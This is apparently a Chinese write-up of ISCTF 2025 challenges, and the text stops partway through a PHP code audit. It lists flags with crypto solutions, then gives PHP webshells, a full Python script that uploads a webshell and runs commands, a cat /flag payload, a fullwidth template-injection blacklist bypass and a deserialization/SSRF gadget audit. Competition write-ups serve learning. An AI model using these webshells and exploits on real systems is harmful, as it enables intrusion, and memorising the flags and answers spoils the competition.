![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/12\/image.png\")
<\/div><\/figure>\n\n\n\n\u8001\u4e1c\u897f\u4eec\u5e38\u5728\u7fa4\u91cc\u8bf4ISCTF\u4eca\u5e74\u80af\u5b9a\u4f1a\u51fa\u4e00\u9053\u5411\u84dd\u9ca8\u4fe1\u606f\u516c\u4f17\u53f7\u540e\u53f0\u53d1\u90015202FTCSI\u83b7\u53d6\u7b7e\u5230FLAG\u7684\u9898\u3002<\/code><\/pre>\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\nISCTF{0nce_M0re_With_Feeling_And_The_J0urney_C0ntinues!!}<\/code><\/pre>\n\n\n\n\u9650\u65f6<\/em> What a crazy day!! \u4e4b\u52c7\u6562\u8005\u7684\u6e38\u620f<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\nISCTF{7hank_you_&_now_you_can_win_3v3n_mor3!!}<\/code><\/pre>\n\n\n\nOSINT-4<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\nISCTF{like.crazy.thursdays}<\/code><\/pre>\n\n\n\nEz_Caesar<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\ntask.py<\/p>\n\n\n\n
def variant_caesar_encrypt(text):\n encrypted = \"\"\n shift = 2\n for char in text:\n if char.isalpha():\n if char.isupper():\n base = ord('A')\n new_char = chr((ord(char) - base + shift) % 26 + base)\n else:\n base = ord('a')\n new_char = chr((ord(char) - base + shift) % 26 + base)\n encrypted += new_char\n shift += 3\n else:\n encrypted += char\n return encrypted\n\n# KXKET{Tubsdx_re_hg_zytc_hxq_vnjma}<\/code><\/pre>\n\n\n\n\u52a0\u5bc6\u8fc7\u7a0b<\/strong><\/p>\n\n\n\n\n- \u521d\u59cb\u504f\u79fb\u91cf<\/strong>\uff1a
shift = 2<\/code><\/li>\n\n\n\n- \u52a8\u6001\u504f\u79fb<\/strong>\uff1a\u6bcf\u52a0\u5bc6\u4e00\u4e2a\u5b57\u6bcd\u540e\uff0c\u504f\u79fb\u91cf\u589e\u52a0
+3<\/code><\/li>\n\n\n\n- \u4fdd\u6301\u975e\u5b57\u6bcd\u5b57\u7b26\u4e0d\u53d8<\/strong>\uff1a\u7a7a\u683c\u3001\u6807\u70b9\u7b49\u76f4\u63a5\u4fdd\u7559<\/li>\n\n\n\n
- \u5927\u5c0f\u5199\u5206\u522b\u5904\u7406<\/strong>\uff1a\u5927\u5199\u5b57\u6bcd\u548c\u5927\u5199\u5b57\u6bcd\u6620\u5c04\uff0c\u5c0f\u5199\u548c\u5c0f\u5199\u6620\u5c04<\/li>\n<\/ol>\n\n\n\n
\u52a0\u5bc6\u793a\u4f8b\uff1a<\/p>\n\n\n\n
\u5bf9\u4e8e\u5b57\u6bcd 'A'<\/code> \u6216 'a'<\/code>\uff1a<\/p>\n\n\n\n\n- \u7b2c\u4e00\u6b21\u52a0\u5bc6\uff1a
shift=2<\/code> \u2192 \u53d8\u4e3a 'C'<\/code> \u6216 'c'<\/code><\/li>\n\n\n\n- \u7b2c\u4e8c\u6b21\u52a0\u5bc6\uff1a
shift=5<\/code> \u2192 \u5bf9\u5e94\u5b57\u6bcd\u79fb\u52a85\u4f4d<\/li>\n\n\n\n- \u7b2c\u4e09\u6b21\u52a0\u5bc6\uff1a
shift=8<\/code> \u2192 \u5bf9\u5e94\u5b57\u6bcd\u79fb\u52a88\u4f4d<\/li>\n\n\n\n- \u4f9d\u6b64\u7c7b\u63a8…<\/li>\n<\/ul>\n\n\n\n
\u89e3\u5bc6py3\uff1a<\/p>\n\n\n\n
def variant_caesar_decrypt(ciphertext):\n decrypted = \"\"\n shift = 2 # \u521d\u59cb\u504f\u79fb\u91cf\u4e0e\u52a0\u5bc6\u65f6\u76f8\u540c\n for char in ciphertext:\n if char.isalpha():\n if char.isupper():\n base = ord('A')\n # \u89e3\u5bc6\u65f6\u4f7f\u7528\u51cf\u53bb\u504f\u79fb\u91cf\n new_char = chr((ord(char) - base - shift) % 26 + base)\n else:\n base = ord('a')\n new_char = chr((ord(char) - base - shift) % 26 + base)\n decrypted += new_char\n shift += 3 # \u504f\u79fb\u91cf\u53d8\u5316\u4e0e\u52a0\u5bc6\u65f6\u4e00\u81f4\n else:\n decrypted += char\n return decrypted\n\n# \u89e3\u5bc6flag\ncipher_flag = \"KXKET{Tubsdx_re_hg_zytc_hxq_vnjma}\"\nplain_flag = variant_caesar_decrypt(cipher_flag)\nprint(plain_flag)<\/code><\/pre>\n\n\n\n\u52a0\u5bc6\u662f\u52a0\u6cd5\uff0c\u89e3\u5bc6\u4f7f\u7528\u51cf\u6cd5<\/strong>\uff1a<\/p>\n\n\n\n\n- \u52a0\u5bc6\uff1a
(\u539f\u5b57\u7b26 - base + shift) % 26<\/code><\/li>\n\n\n\n- \u89e3\u5bc6\uff1a
(\u5bc6\u6587\u5b57\u7b26 - base - shift) % 26<\/code><\/li>\n<\/ul>\n\n\n\n\u5bc6\u6587\u5206\u6790\uff1a<\/p>\n\n\n\n
\u5bc6\u6587\uff1aKXKET{Tubsdx_re_hg_zytc_hxq_vnjma}<\/code><\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nISCTF{Caesar_is_so_easy_and_funny}<\/code><\/pre>\n\n\n\n\u5c0f\u84dd\u9ca8\u7684RC4\u7cfb\u7edf<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\ntask.py<\/p>\n\n\n\n
import hashlib\n\nclass StreamCipher:\n def __init__(self, key):\n\n self.S = list(range(256))\n self.i = 0\n self.j = 0\n\n j = 0\n key_bytes = self._key_to_bytes(key)\n for i in range(256):\n j = (j + self.S[i] + key_bytes[i % len(key_bytes)]) % 256\n self.S[i], self.S[j] = self.S[j], self.S[i]\n\n def _key_to_bytes(self, key):\n\n if isinstance(key, str):\n return hashlib.sha256(key.encode()).digest()\n elif isinstance(key, bytes):\n return hashlib.sha256(key).digest()\n\n def _prga(self):\n\n self.i = (self.i + 1) % 256\n self.j = (self.j + self.S[self.i]) % 256\n self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]\n K = self.S[(self.S[self.i] + self.S[self.j]) % 256]\n return K\n\n def crypt(self, data):\n\n if isinstance(data, str):\n data = data.encode('utf-8')\n\n result = bytearray()\n for byte in data:\n key_byte = self._prga()\n result.append(byte ^ key_byte)\n\n return bytes(result)\n\ndef encrypt_string(text, key):\n\n cipher = StreamCipher(key)\n encrypted = cipher.crypt(text)\n return encrypted.hex()\n\n#ISCTF2025\n#ba19a7116763ba8ba1c236c6bdc30187dcc8afb28c8fa5f266763880b74f5fff915613718f4d19c3baf4bbe24bd57303ce103d<\/code><\/pre>\n\n\n\nRC4 \u662f\u4e00\u79cd\u5bf9\u79f0\u6d41\u5bc6\u7801\u7b97\u6cd5\uff0c\u5305\u62ec\u4e24\u4e2a\u4e3b\u8981\u9636\u6bb5\uff1a<\/p>\n\n\n\n
\n- \u5bc6\u94a5\u8c03\u5ea6\u7b97\u6cd5\uff08KSA\uff09<\/strong>\uff1a\u7528\u5bc6\u94a5\u521d\u59cb\u5316\u4e00\u4e2a 256 \u5b57\u8282\u7684 S \u76d2\uff08S-box\uff09\u3002<\/li>\n\n\n\n
- \u4f2a\u968f\u673a\u751f\u6210\u7b97\u6cd5\uff08PRGA\uff09<\/strong>\uff1a\u7528 S \u76d2\u751f\u6210\u4f2a\u968f\u673a\u5b57\u8282\u6d41\uff0c\u4e0e\u660e\u6587\u5f02\u6216\u52a0\u5bc6\u3002<\/li>\n<\/ol>\n\n\n\n
\u5bc6\u6587\uff1a\nba19a7116763ba8ba1c236c6bdc30187dcc8afb28c8fa5f266763880b74f5fff915613718f4d19c3baf4bbe24bd57303ce103d\n\u5bc6\u94a5\uff1aISCTF2025<\/code><\/pre>\n\n\n\n\n- \u7528
key<\/code>\uff08 \"ISCTF2025\"<\/code>\uff09\u7684 SHA256 \u54c8\u5e0c\u4f5c\u4e3a\u5bc6\u94a5\u5b57\u8282\u3002<\/li>\n\n\n\n- \u6839\u636e\u5bc6\u94a5\u6253\u4e71 S \u76d2\u3002<\/li>\n<\/ul>\n\n\n\n
PRGA \u6b65\u9aa4<\/strong>\uff1a<\/p>\n\n\n\n\n- \u6bcf\u8c03\u7528\u4e00\u6b21\uff0c\u751f\u6210\u4e00\u4e2a\u4f2a\u968f\u673a\u5b57\u8282\uff08\u5bc6\u94a5\u6d41\u5b57\u8282\uff09\u3002<\/li>\n\n\n\n
- \u4e0e\u660e\u6587\u9010\u5b57\u8282\u5f02\u6216\u3002<\/li>\n<\/ul>\n\n\n\n
py3\u89e3\u5bc6\u4ee3\u7801\uff1a<\/p>\n\n\n\n
import hashlib\n\nclass StreamCipher:\n def __init__(self, key):\n self.S = list(range(256))\n self.i = 0\n self.j = 0\n\n j = 0\n key_bytes = self._key_to_bytes(key)\n for i in range(256):\n j = (j + self.S[i] + key_bytes[i % len(key_bytes)]) % 256\n self.S[i], self.S[j] = self.S[j], self.S[i]\n\n def _key_to_bytes(self, key):\n if isinstance(key, str):\n return hashlib.sha256(key.encode()).digest()\n elif isinstance(key, bytes):\n return hashlib.sha256(key).digest()\n\n def _prga(self):\n self.i = (self.i + 1) % 256\n self.j = (self.j + self.S[self.i]) % 256\n self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]\n K = self.S[(self.S[self.i] + self.S[self.j]) % 256]\n return K\n\n def crypt(self, data):\n if isinstance(data, str):\n data = data.encode('utf-8')\n\n result = bytearray()\n for byte in data:\n key_byte = self._prga()\n result.append(byte ^ key_byte)\n\n return bytes(result)\n\ndef decrypt_hex(hex_str, key):\n cipher = StreamCipher(key)\n encrypted_data = bytes.fromhex(hex_str)\n decrypted = cipher.crypt(encrypted_data)\n return decrypted.decode('utf-8', errors='replace')\n\n# \u5df2\u77e5\u5bc6\u6587\u548c\u6b63\u786e\u7684\u5bc6\u94a5\nciphertext = \"ba19a7116763ba8ba1c236c6bdc30187dcc8afb28c8fa5f266763880b74f5fff915613718f4d19c3baf4bbe24bd57303ce103d\"\ncorrect_key = \"ISCTF2025\"\n\n# \u4f7f\u7528\u6b63\u786e\u7684\u5bc6\u94a5\u89e3\u5bc6\ntry:\n plaintext = decrypt_hex(ciphertext, correct_key)\n print(f\"\u89e3\u5bc6\u6210\u529f\uff01\")\n print(f\"\u5bc6\u94a5: {correct_key}\")\n print(f\"Flag: {plaintext}\")\nexcept Exception as e:\n print(f\"\u89e3\u5bc6\u5931\u8d25: {e}\")<\/code><\/pre>\n\n\n\n\u89e3\u5bc6\u8fc7\u7a0b\u4e0e\u52a0\u5bc6\u5b8c\u5168\u76f8\u540c<\/strong>\uff1a<\/p>\n\n\n\n\n- \u91cd\u65b0\u7528\u76f8\u540c\u5bc6\u94a5\u521d\u59cb\u5316 RC4\uff08S \u76d2\u76f8\u540c\uff09\u3002<\/li>\n\n\n\n
- \u7528\u76f8\u540c\u7684 PRGA \u751f\u6210\u76f8\u540c\u7684\u5bc6\u94a5\u6d41\u3002<\/li>\n\n\n\n
- \u5bc6\u6587 XOR \u5bc6\u94a5\u6d41 = \u660e\u6587\u3002<\/li>\n<\/ul>\n\n\n\n
<\/div><\/figure>\n\n\n\nISCTF{Welcome_to_ISCTF_&_this_is_a_secret_with_RC4}<\/code><\/pre>\n\n\n\n\u6211\u53bb\uff0cFlag\u662f\u771f\u7684\uff01\uff1f<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n\u968f\u4fbf\u4e00\u4e2a\u5c31\u884c<\/p>\n\n\n\n
\u6211\u63d0\u4ea4\u7684\u662f<\/p>\n\n\n\n
ISCTF{\u55b5\u55b5\u55b5?}<\/code><\/pre>\n\n\n\nWeb<\/h2>\n\n\n\nb@by n0t1ce b0ard<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n\u65b9\u6cd5\u4e00\uff1a<\/h4>\n\n\n\n
\u4fe1\u606f\u6536\u96c6<\/strong><\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\nhttps://github.com\/LamentXU123\/cve\/blob\/main\/RCE1.md<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n\n\n\n\u8ddf\u7740\u63d0\u793a\u8fdb\u884c\u64cd\u4f5c<\/p>\n\n\n\n
<?php\n\/\/ \u6f0f\u6d1e\u8be6\u60c5\n\/\/ \u6f0f\u6d1e\u4f4d\u7f6e\uff1a\n\/\/ \u6587\u4ef6: registration.php \u548c edit.php\n\/\/ \u884c\u53f7: 36-37\u884c\uff08\u5728edit.php\u4e2d\uff09\n\/\/ \u6f0f\u6d1e\u7c7b\u578b: \u65e0\u9650\u5236\u6587\u4ef6\u4e0a\u4f20\u5bfc\u81f4RCE\n\/\/\n\/\/ \u6838\u5fc3\u6f0f\u6d1e\u4ee3\u7801\uff1a\n\/\/ edit.php \u7b2c36-37\u884c\n\/\/ mkdir(\"images\/$e\"); \/\/ $e\u662f\u7528\u6237\u90ae\u7bb1\n\/\/ move_uploaded_file($_FILES['img']['tmp_name'],\"images\/$e\/\".$_FILES['img']['name']);\n\/\/ \/\/ \u6ca1\u6709\u6587\u4ef6\u7c7b\u578b\u9a8c\u8bc1\uff01\n\/\/\n\/\/ \u5229\u7528\u6b65\u9aa4\uff1a\n\/\/ \u7b2c1\u6b65\uff1a\u6ce8\u518c\u7528\u6237\u5e76\u4e0a\u4f20Webshell\n\/\/ \u4f7f\u7528POST\u8bf7\u6c42\u5230 \/registration.php\uff0c\u4e0a\u4f20\u4e00\u4e2aPHP webshell\uff1a\n\/\/\n\/\/ Webshell\u5185\u5bb9\u793a\u4f8b (basic_webshell.php):\nif(isset($_GET['cmd'])) {\n system($_GET['cmd']);\n}\n\/\/ \u6216\u8005\u66f4\u9690\u853d\u7684\nif(isset($_REQUEST['attack'])) {\n @eval($_REQUEST['attack']);\n}\n?>\n\n<!--\n\u7b2c2\u6b65\uff1a\u786e\u5b9aWebshell\u8bbf\u95ee\u8def\u5f84\n\u6839\u636e\u6f0f\u6d1e\u63cf\u8ff0\uff0c\u4e0a\u4f20\u7684\u6587\u4ef6\u5b58\u653e\u5728\uff1a\n\n\/images\/{\u7528\u6237\u90ae\u7bb1}\/{\u6587\u4ef6\u540d}\n\n\u4f8b\u5982\uff1a\n\u90ae\u7bb1: hacker@example.com\n\u6587\u4ef6\u540d: shell.php\n\u8bbf\u95eeURL: \/images\/hacker@example.com\/shell.php\n\n\u7b2c3\u6b65\uff1a\u6267\u884c\u547d\u4ee4\n\u8bbf\u95eewebshell\u5e76\u4f20\u9012\u53c2\u6570\u6267\u884c\u547d\u4ee4\uff1a\n\u793a\u4f8b1\uff1a\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\n\n\/images\/hacker@example.com\/shell.php?cmd=whoami\n\/images\/hacker@example.com\/shell.php?cmd=ls -la \/\n\n\u793a\u4f8b2\uff1a\u4f7f\u7528eval\u6267\u884cPHP\u4ee3\u7801\n\/images\/hacker@example.com\/basic_webshell.php?attack=system('id');\n\n\u5b9e\u6218\u5229\u7528\u811a\u672c\uff1a\n\n#!\/usr\/bin\/env python3\nimport requests\nimport sys\n\ndef exploit(target_url, email, cmd):\n \"\"\"\n \u5229\u7528\u5728\u7ebf\u901a\u77e5\u677f\u7684\u6587\u4ef6\u4e0a\u4f20RCE\u6f0f\u6d1e\n\n Args:\n target_url: \u76ee\u6807\u7f51\u7ad9\u57fa\u7840URL (\u5982: http:\/\/target.com)\n email: \u7528\u4e8e\u6ce8\u518c\u548c\u76ee\u5f55\u521b\u5efa\u7684\u90ae\u7bb1\n cmd: \u8981\u6267\u884c\u7684\u7cfb\u7edf\u547d\u4ee4\n \"\"\"\n # 1. \u6784\u9020webshell\u6587\u4ef6\n webshell_name = \"shell.php\"\n webshell_content = \"<?php if(isset($_GET['c'])) { system($_GET['c']); } ?>\"\n\n # 2. \u51c6\u5907\u6ce8\u518c\/\u4e0a\u4f20\u6570\u636e\n files = {\n 'img': (webshell_name, webshell_content, 'application\/octet-stream')\n }\n\n data = {\n 'n': 'exploit_test', # \u7528\u6237\u540d\n 'e': email, # \u90ae\u7bb1 - \u7528\u4e8e\u521b\u5efa\u76ee\u5f55\n 'p': 'password123', # \u5bc6\u7801\n 'mob': '1234567890', # \u624b\u673a\n 'gen': 'm', # \u6027\u522b\n 'hob[]': 'reading', # \u7231\u597d\n 'yy': '1990', # \u5e74\n 'mm': '1', # \u6708\n 'dd': '1', # \u65e5\n 'save': 'Save' # \u63d0\u4ea4\u6309\u94ae\n }\n\n # 3. \u53d1\u9001\u6ce8\u518c\u8bf7\u6c42\u4e0a\u4f20webshell\n print(f\"[*] \u5c1d\u8bd5\u4e0a\u4f20webshell\u5230 {email}...\")\n reg_url = f\"{target_url}\/registration.php\"\n response = requests.post(reg_url, data=data, files=files)\n\n if response.status_code == 200:\n print(\"[+] Webshell\u53ef\u80fd\u5df2\u4e0a\u4f20\u6210\u529f\")\n else:\n print(f\"[-] \u4e0a\u4f20\u5931\u8d25\uff0c\u72b6\u6001\u7801: {response.status_code}\")\n return\n\n # 4. \u8bbf\u95eewebshell\u6267\u884c\u547d\u4ee4\n webshell_url = f\"{target_url}\/images\/{email}\/{webshell_name}?c={cmd}\"\n print(f\"[*] \u8bbf\u95eewebshell: {webshell_url}\")\n result = requests.get(webshell_url)\n\n if result.status_code == 200:\n print(\"[+] \u547d\u4ee4\u6267\u884c\u7ed3\u679c:\")\n print(result.text)\n else:\n print(f\"[-] Webshell\u8bbf\u95ee\u5931\u8d25\uff0c\u72b6\u6001\u7801: {result.status_code}\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(f\"\u7528\u6cd5: {sys.argv[0]} <\u76ee\u6807URL> <\u90ae\u7bb1> <\u547d\u4ee4>\")\n print(f\"\u793a\u4f8b: {sys.argv[0]} http:\/\/target.com hacker@test.com 'ls -la'\")\n sys.exit(1)\n\n exploit(sys.argv[1], sys.argv[2], sys.argv[3])\n\n--><\/code><\/pre>\n\n\n\n\u4e0a\u4f20webshell<\/strong><\/p>\n\n\n\n\u6309\u7167\u8981\u6c42\u952e\u5165<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nshell.php<\/p>\n\n\n\n
<?php if(isset($_GET['cmd'])) {\nsystem($_GET['cmd']);\n}<\/code><\/pre>\n\n\n\n\u6839\u636e\u8def\u5f84\/images\/{\u7528\u6237\u90ae\u7bb1}\/{\u6587\u4ef6\u540d}\u8bbf\u95eewebshell\u6587\u4ef6<\/p>\n\n\n\n
\/images\/admin\/shell.php<\/code><\/pre>\n\n\n\n\u547d\u4ee4\u6267\u884c<\/strong><\/p>\n\n\n\nls-la \/<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\npayload:<\/strong><\/p>\n\n\n\n?cmd=cat \/flag<\/code><\/pre>\n\n\n\n\u5f97\u5230flag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u65b9\u6cd5\u4e8c\uff1a<\/h4>\n\n\n\n
\u6b63\u5e38\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u601d\u7ef4<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\nhttp://challenge.bluesharkinfo.com:29114\/images\/sitePHP.jpg<\/code><\/pre>\n\n\n\n\u5c31\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u70b9<\/p>\n\n\n\n
\u96be\u8fc7\u7684bottle<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n\u6e90\u7801\u4e5f\u7ed9\u4e86
\u7528ai\u8f85\u52a9\u4e00\u4e0b
\u53d1\u73b0\u6e90\u7801\u4e2d\u7684\u9ed1\u540d\u5355\u6ca1\u6709\u8fc7\u6ee4f \uff0cl\uff0ca, g\u8fd9\u56db\u4e2a\u5b57\u7b26<\/p>\n\n\n\n
# hint: flag is in \/flag<\/code><\/pre>\n\n\n\n\u4e5f\u627e\u5230\u4e86 flag \u5728 \/flag \u6587\u4ef6\u4e2d\u7ebf\u7d22
\u6784\u9020\u6587\u4ef6<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n{{ \uff4f\uff50\uff45\uff4e('\/flag').\uff52\uff45\uff41\uff44() }}<\/code><\/pre>\n\n\n\n\u8fd9\u91cc\u7684\u5b57\u7b26\u662f\u5168\u89d2\u7b26\u53f7
\u7ed5\u8fc7\u9ed1\u540d\u5355\u5bf9 \u201c\u534a\u89d2\u7279\u6b8a\u5b57\u7b26\u201d \u7684\u9650\u5236
\u628a\u6587\u4ef6\u538b\u7f29\u6210zip
\u4e0a\u4f20<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n\u62ff\u5230flag<\/p>\n\n\n\n
\u6765\u7b7e\u4e2a\u5230\u5427<\/h3>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5c06\u914d\u7f6e\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n
\u4ee3\u7801\u5ba1\u8ba1<\/p>\n\n\n\n
api.php<\/strong><\/p>\n\n\n\n<?php\n\/\/ \u5f15\u5165\u914d\u7f6e\u6587\u4ef6\uff08\u901a\u5e38\u5305\u542b\u6570\u636e\u5e93\u8fde\u63a5 $db \u7b49\uff09\nrequire_once \".\/config.php\";\n\n\/\/ \u5f15\u5165\u81ea\u5b9a\u4e49\u7c7b\u5b9a\u4e49\uff08\u4f8b\u5982 ShitMountant \u7c7b\uff09\nrequire_once \".\/classes.php\";\n\n\/\/ \u4ece URL \u67e5\u8be2\u53c2\u6570\u4e2d\u83b7\u53d6 'id'\uff0c\u5982\u679c\u672a\u63d0\u4f9b\u5219\u9ed8\u8ba4\u4e3a '\u55b5\u55b5\u55b5?'\uff08\u7528\u4e8e\u53cb\u597d\u9519\u8bef\u63d0\u793a\uff09\n$id = $_GET[\"id\"] ?? '\u55b5\u55b5\u55b5?';\n\n\/\/ \u51c6\u5907 SQL \u67e5\u8be2\u8bed\u53e5\uff1a\u4ece notes \u8868\u4e2d\u6839\u636e id \u67e5\u8be2 content \u5b57\u6bb5\n\/\/ \u4f7f\u7528\u9884\u5904\u7406\u8bed\u53e5\u9632\u6b62 SQL \u6ce8\u5165\n$s = $db->prepare(\"SELECT content FROM notes WHERE id = ?\");\n$s->execute([$id]); \/\/ \u5b89\u5168\u5730\u7ed1\u5b9a\u53c2\u6570\u5e76\u6267\u884c\u67e5\u8be2\n\n\/\/ \u4ece\u7ed3\u679c\u96c6\u4e2d\u83b7\u53d6\u4e00\u884c\u6570\u636e\uff08\u5173\u8054\u6570\u7ec4\uff09\n$row = $s->fetch(PDO::FETCH_ASSOC);\n\n\/\/ \u5982\u679c\u6ca1\u6709\u627e\u5230\u5bf9\u5e94\u7684\u8bb0\u5f55\uff0c\u5219\u8f93\u51fa\u9519\u8bef\u4fe1\u606f\u5e76\u7ec8\u6b62\u811a\u672c\nif (!$row) {\n die(\"\u55b5\u55b5\u55b5?\"); \/\/ \u901a\u5e38\u7528\u4e8e\u8868\u793a\"\u8bf7\u6c42\u65e0\u6548\"\u6216\"\u672a\u627e\u5230\"\n}\n\n\/\/ \u5c06\u6570\u636e\u5e93\u4e2d\u5b58\u50a8\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u53cd\u5e8f\u5217\u5316\u4e3a PHP \u5bf9\u8c61\/\u6570\u636e\n$cfg = unserialize($row[\"content\"]);\n\n\/\/ \u68c0\u67e5\u53cd\u5e8f\u5217\u5316\u540e\u7684\u5bf9\u8c61\u662f\u5426\u662f ShitMountant \u7c7b\u7684\u5b9e\u4f8b\nif ($cfg instanceof ShitMountant) {\n \/\/ \u8c03\u7528\u8be5\u5bf9\u8c61\u7684 fetch() \u65b9\u6cd5\u83b7\u53d6\u5185\u5bb9\n $r = $cfg->fetch();\n\n \/\/ \u8f93\u51fa\u6210\u529f\u63d0\u793a\u548c\u5185\u5bb9\n echo \"ok!\" . \"<br>\";\n\n \/\/ \u5bf9\u8f93\u51fa\u5185\u5bb9\u8fdb\u884c HTML \u8f6c\u4e49\u5e76\u4fdd\u7559\u6362\u884c\u7b26\uff08\u9632\u6b62 XSS\uff09\n echo nl2br(htmlspecialchars($r));\n} else {\n \/\/ \u5982\u679c\u4e0d\u662f\u9884\u671f\u7684\u5bf9\u8c61\u7c7b\u578b\uff0c\u8fd4\u56de\u9519\u8bef\u4fe1\u606f\n echo \"\u55b5\u55b5\u55b5?\";\n}\n?><\/code><\/pre>\n\n\n\nclasses.php<\/strong><\/p>\n\n\n\n<?php\n\/\/ \u5b9a\u4e49\u4e00\u4e2a\u540d\u4e3a FileLogger \u7684\u7c7b\uff0c\u7528\u4e8e\u5c06\u65e5\u5fd7\u5199\u5165\u6587\u4ef6\nclass FileLogger {\n \/\/ \u9ed8\u8ba4\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\u4e3a \/tmp\/notehub.log\uff08Linux \u7cfb\u7edf\u4e34\u65f6\u76ee\u5f55\uff09\n public $logfile = \"\/tmp\/notehub.log\";\n\n \/\/ \u7528\u4e8e\u7d2f\u79ef\u5f85\u5199\u5165\u7684\u65e5\u5fd7\u5185\u5bb9\n public $content = \"\";\n\n \/\/ \u6784\u9020\u51fd\u6570\uff1a\u5141\u8bb8\u5728\u5b9e\u4f8b\u5316\u65f6\u4f20\u5165\u81ea\u5b9a\u4e49\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\n public function __construct($f = null) {\n \/\/ \u5982\u679c\u4f20\u5165\u4e86\u6587\u4ef6\u8def\u5f84\u53c2\u6570 $f\uff0c\u5219\u8986\u76d6\u9ed8\u8ba4\u65e5\u5fd7\u8def\u5f84\n if ($f) {\n $this->logfile = $f;\n }\n }\n\n \/\/ write \u65b9\u6cd5\uff1a\u5411\u65e5\u5fd7\u5185\u5bb9\u8ffd\u52a0\u6d88\u606f\uff0c\u5e76\u7acb\u5373\u5199\u5165\u6587\u4ef6\uff08\u8ffd\u52a0\u6a21\u5f0f\uff09\n public function write($msg) {\n \/\/ \u5c06\u4f20\u5165\u7684\u6d88\u606f $msg \u62fc\u63a5\u5230\u5f53\u524d content \u672b\u5c3e\uff0c\u5e76\u52a0\u4e0a\u6362\u884c\u7b26\n $this->content .= $msg . \"n\";\n\n \/\/ \u5c06\u7d2f\u8ba1\u7684 content \u5185\u5bb9\u8ffd\u52a0\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\uff08\u6ce8\u610f\uff1a\u8fd9\u91cc\u6bcf\u6b21\u8c03\u7528\u90fd\u5199\u5165\u5168\u90e8 content\uff0c\u53ef\u80fd\u91cd\u590d\uff01\uff09\n file_put_contents($this->logfile, $this->content, FILE_APPEND);\n }\n\n \/\/ \u6790\u6784\u51fd\u6570\uff1a\u5728\u5bf9\u8c61\u9500\u6bc1\u65f6\u81ea\u52a8\u8c03\u7528\n public function __destruct() {\n \/\/ \u5982\u679c content \u4e0d\u4e3a\u7a7a\uff0c\u5219\u518d\u6b21\u5c06\u5185\u5bb9\u8ffd\u52a0\u5199\u5165\u65e5\u5fd7\u6587\u4ef6\n if ($this->content) {\n file_put_contents($this->logfile, $this->content, FILE_APPEND);\n }\n }\n}\n\n\/\/ \u5b9a\u4e49\u4e00\u4e2a\u540d\u4e3a ShitMountant \u7684\u7c7b\uff08\u540d\u79f0\u6697\u793a\u5176\u53ef\u80fd\u7528\u4e8e\"\u6302\u8f7d\"\u6216\"\u83b7\u53d6\"\u5916\u90e8\u5185\u5bb9\uff09\nclass ShitMountant {\n \/\/ \u5b58\u50a8\u8981\u83b7\u53d6\u7684 URL\n public $url;\n\n \/\/ \u6301\u6709\u4e00\u4e2a FileLogger \u5b9e\u4f8b\uff0c\u7528\u4e8e\u8bb0\u5f55\u64cd\u4f5c\u65e5\u5fd7\n public $logger;\n\n \/\/ \u6784\u9020\u51fd\u6570\uff1a\u63a5\u6536\u4e00\u4e2a URL \u53c2\u6570\n public function __construct($url) {\n \/\/ \u4fdd\u5b58\u4f20\u5165\u7684 URL\n $this->url = $url;\n\n \/\/ \u521b\u5efa\u4e00\u4e2a\u9ed8\u8ba4\u7684 FileLogger \u5b9e\u4f8b\uff08\u65e5\u5fd7\u5199\u5165 \/tmp\/notehub.log\uff09\n $this->logger = new FileLogger();\n }\n\n \/\/ fetch \u65b9\u6cd5\uff1a\u4ece\u6307\u5b9a URL \u83b7\u53d6\u5185\u5bb9\uff0c\u5e76\u8bb0\u5f55\u65e5\u5fd7\n public function fetch() {\n \/\/ \u4f7f\u7528 file_get_contents \u4ece $this->url \u83b7\u53d6\u8fdc\u7a0b\u5185\u5bb9\uff08\u53ef\u80fd\u5bfc\u81f4 SSRF \u6216\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff01\uff09\n $c = file_get_contents($this->url);\n\n \/\/ \u5982\u679c logger \u5b58\u5728\uff0c\u5219\u8bb0\u5f55\"\u5df2\u83b7\u53d6\"\u7684\u65e5\u5fd7\u4fe1\u606f\n if ($this->logger) {\n $this->logger->write(\"fetched ==> \" . $this->url);\n }\n\n \/\/ \u8fd4\u56de\u83b7\u53d6\u5230\u7684\u5185\u5bb9\n return $c;\n }\n\n \/\/ 